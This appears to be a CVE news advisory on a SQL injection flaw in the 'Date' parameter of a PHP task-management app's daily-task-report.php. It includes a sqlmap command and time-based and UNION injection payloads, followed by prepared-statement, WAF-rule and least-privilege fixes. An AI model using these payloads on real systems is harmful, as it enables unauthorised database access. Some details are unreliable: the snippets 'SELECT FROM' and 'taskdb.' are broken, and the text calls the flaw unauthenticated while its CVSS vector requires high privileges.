SourceCodester Employee Task Management System, SQL Injection, CVE-2026-3752 (Medium)

Listen to this Post

The CVE-2026-3752 vulnerability is a SQL Injection flaw found in the SourceCodester Employee Task Management System, specifically affecting versions up to 1.0 . The issue resides in an unknown function within the `/daily-task-report.php` file, which is part of the application’s GET Parameter Handler component . By manipulating the “Date” argument passed via a GET request to this script, an attacker can inject arbitrary SQL code . This is possible because the application fails to properly sanitize or validate the input before using it in a database query. As the component handles GET parameters, the attack can be initiated remotely without requiring authentication, making it easily accessible over the network. The vulnerability has a medium severity rating with a CVSS vector of CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P, indicating a low impact on confidentiality, integrity, and availability, but with an increased likelihood of exploitation as a proof-of-concept has been publicly published .

dailycve form:

Platform: SourceCodester
Version: up to 1.0
Vulnerability : SQL Injection
Severity: Medium
date: 2026-03-08

Prediction: Patch unlikely soon

What Undercode Say:

Analytics:

The vulnerability is remotely exploitable via the GET parameter handler. Successful injection could allow an attacker to bypass login mechanisms, extract sensitive data like user credentials and task details, or modify database records . Given the history of similar vulnerabilities in this product line (e.g., CVE-2023-0904, CVE-2024-2556), insecure direct database queries are a recurring pattern .

Exploit:

Example using sqlmap to exploit the 'Date' parameter
sqlmap -u "http://localhost/employee-task-management/daily-task-report.php?Date=2026-03-09" --batch --dbs
Manual proof-of-concept payload to test for vulnerability
Original URL: http://localhost/employee-task-management/daily-task-report.php?Date=2026-03-09
Payload to cause a time delay (e.g., for MySQL)
http://localhost/employee-task-management/daily-task-report.php?Date=2026-03-09' AND (SELECT FROM (SELECT(SLEEP(5)))a)-- -
Payload to extract database version
http://localhost/employee-task-management/daily-task-report.php?Date=2026-03-09' UNION ALL SELECT @@version, null, null-- -

Protection from this CVE:

1. Input Validation and Sanitization
In PHP, use prepared statements with parameterized queries (PDO or MySQLi)
<?php
$pdo = new PDO('mysql:host=localhost;dbname=dbname', 'user', 'pass');
$stmt = $pdo->prepare("SELECT FROM tasks WHERE date = :date");
$stmt->execute(['date' => $_GET['Date']]);
$results = $stmt->fetchAll();
?>
2. Web Application Firewall (WAF) Rule (e.g., ModSecurity)
Block requests with suspicious SQL patterns in the 'Date' parameter
SecRule ARGS:Date "@contains '"' "id:1001,phase:2,deny,status:403,msg:'SQL Injection Attempt'"
SecRule ARGS:Date "@contains UNION" "id:1002,phase:2,deny,status:403,msg:'SQL Injection Attempt'"
3. Principle of Least Privilege
Ensure the database user used by the web app has minimal permissions
GRANT SELECT, INSERT, UPDATE ON taskdb. TO 'webuser'@'localhost';
-- REVOKE DROP, CREATE, ALTER, FILE, EXECUTE, SUPER

Impact:

An attacker exploiting this flaw could read, modify, or delete sensitive information from the database, potentially leading to a full system compromise if combined with other vulnerabilities. The confidentiality, integrity, and availability of the application data are at a low risk, according to the CVSS metrics, but the public availability of an exploit increases the immediate threat to unpatched systems .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top